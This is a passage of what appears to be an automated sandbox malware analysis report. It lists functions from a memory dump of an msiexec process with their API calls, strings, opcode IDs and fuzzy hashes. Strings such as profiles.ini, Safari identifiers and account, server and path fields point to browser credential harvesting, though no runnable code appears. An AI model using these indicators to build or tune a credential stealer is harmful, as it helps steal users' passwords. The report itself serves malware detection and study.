                                                                            • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                            • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                            • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                            • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                            Function 0040AA04 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: free
                                                                            • String ID:
                                                                            • API String ID: 1294909896-0
                                                                            • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                            • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                            • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                            • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                            Function 00415304 Relevance: 1.3, APIs: 1, Instructions: 6COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: free
                                                                            • String ID:
                                                                            • API String ID: 1294909896-0
                                                                            • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                            • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                            • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                            • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E

                                                                            Non-executed Functions

                                                                            Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EmptyClipboard.USER32 ref: 004098EC
                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                            • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                            • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                            • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                            • GetLastError.KERNEL32 ref: 0040995D
                                                                            • CloseHandle.KERNEL32(?), ref: 00409969
                                                                            • GetLastError.KERNEL32 ref: 00409974
                                                                            • CloseClipboard.USER32 ref: 0040997D
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                            • String ID:
                                                                            • API String ID: 3604893535-0
                                                                            • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                            • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                            • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                            • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                            Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                            • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                            • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadMessageProc
                                                                            • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                            • API String ID: 2780580303-317687271
                                                                            • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                            • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                            • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                            • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                            Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EmptyClipboard.USER32 ref: 00409882
                                                                            • wcslen.MSVCRT ref: 0040988F
                                                                            • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                            • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                            • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                            • CloseClipboard.USER32 ref: 004098D7
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                            • String ID:
                                                                            • API String ID: 1213725291-0
                                                                            • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                            • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                            • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                            • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                            Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLastError.KERNEL32 ref: 004182D7
                                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                            • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                            • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                            • LocalFree.KERNEL32(?), ref: 00418342
                                                                            • free.MSVCRT ref: 00418370
                                                                              • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                              • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                            • String ID: OsError 0x%x (%u)
                                                                            • API String ID: 2360000266-2664311388
                                                                            • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                            • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                            • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                            • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                            Function 00401806 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@??3@memcpymemset
                                                                            • String ID:
                                                                            • API String ID: 1865533344-0
                                                                            • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                            • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                            • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                            • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                            Function 004018C0 Relevance: 1.5, APIs: 1, Instructions: 6nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: NtdllProc_Window
                                                                            • String ID:
                                                                            • API String ID: 4255912815-0
                                                                            • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                            • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                            • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                            • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                            Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _wcsicmp.MSVCRT ref: 004022A6
                                                                            • _wcsicmp.MSVCRT ref: 004022D7
                                                                            • _wcsicmp.MSVCRT ref: 00402305
                                                                            • _wcsicmp.MSVCRT ref: 00402333
                                                                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                              • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                            • memset.MSVCRT ref: 0040265F
                                                                            • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                              • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                            • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                            • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                            • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                            • API String ID: 577499730-1134094380
                                                                            • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                            • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                            • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                            • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                            Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                            • String ID: :stringdata$ftp://$http://$https://
                                                                            • API String ID: 2787044678-1921111777
                                                                            • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                            • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                            • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                            • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                            Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                            • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                            • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                            • GetWindowRect.USER32(?,?), ref: 00414088
                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                            • GetDC.USER32 ref: 004140E3
                                                                            • wcslen.MSVCRT ref: 00414123
                                                                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                            • ReleaseDC.USER32(?,?), ref: 00414181
                                                                            • _snwprintf.MSVCRT ref: 00414244
                                                                            • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                            • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                            • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                            • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                            • GetClientRect.USER32(?,?), ref: 004142E1
                                                                            • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                            • GetClientRect.USER32(?,?), ref: 0041433B
                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                            • String ID: %s:$EDIT$STATIC
                                                                            • API String ID: 2080319088-3046471546
                                                                            • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                            • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                            • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                            • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                            Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EndDialog.USER32(?,?), ref: 00413221
                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                            • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                            • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                            • memset.MSVCRT ref: 00413292
                                                                            • memset.MSVCRT ref: 004132B4
                                                                            • memset.MSVCRT ref: 004132CD
                                                                            • memset.MSVCRT ref: 004132E1
                                                                            • memset.MSVCRT ref: 004132FB
                                                                            • memset.MSVCRT ref: 00413310
                                                                            • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                            • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                            • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                            • memset.MSVCRT ref: 004133C0
                                                                            • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                            • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                            • wcscpy.MSVCRT ref: 0041341F
                                                                            • _snwprintf.MSVCRT ref: 0041348E
                                                                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                            • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                            • SetFocus.USER32(00000000), ref: 004134B7
                                                                            Strings
                                                                            • {Unknown}, xrefs: 004132A6
                                                                            • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                            • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                            • API String ID: 4111938811-1819279800
                                                                            • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                            • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                            • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                            • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                            Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                            • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                            • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                            • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                            • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                            • EndDialog.USER32(?,?), ref: 0040135E
                                                                            • DeleteObject.GDI32(?), ref: 0040136A
                                                                            • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                            • ShowWindow.USER32(00000000), ref: 00401398
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                            • ShowWindow.USER32(00000000), ref: 004013A7
                                                                            • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                            • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                            • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                            • String ID:
                                                                            • API String ID: 829165378-0
                                                                            • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                            • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                            • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                            • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                            Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00404172
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                            • wcscpy.MSVCRT ref: 004041D6
                                                                            • wcscpy.MSVCRT ref: 004041E7
                                                                            • memset.MSVCRT ref: 00404200
                                                                            • memset.MSVCRT ref: 00404215
                                                                            • _snwprintf.MSVCRT ref: 0040422F
                                                                            • wcscpy.MSVCRT ref: 00404242
                                                                            • memset.MSVCRT ref: 0040426E
                                                                            • memset.MSVCRT ref: 004042CD
                                                                            • memset.MSVCRT ref: 004042E2
                                                                            • _snwprintf.MSVCRT ref: 004042FE
                                                                            • wcscpy.MSVCRT ref: 00404311
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                            • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                            • API String ID: 2454223109-1580313836
                                                                            • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                            • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                            • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                            • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                            Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                            • SetMenu.USER32(?,00000000), ref: 00411453
                                                                            • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                            • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                            • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                            • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                            • ShowWindow.USER32(?,?), ref: 004115FE
                                                                            • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                            • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                            • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                            • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                            • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                              • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                              • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                            • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                            • API String ID: 4054529287-3175352466
                                                                            • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                            • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                            • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                            • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                            Function 00414F1E Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                            • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                            • API String ID: 3143752011-1996832678
                                                                            • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                            • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                            • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
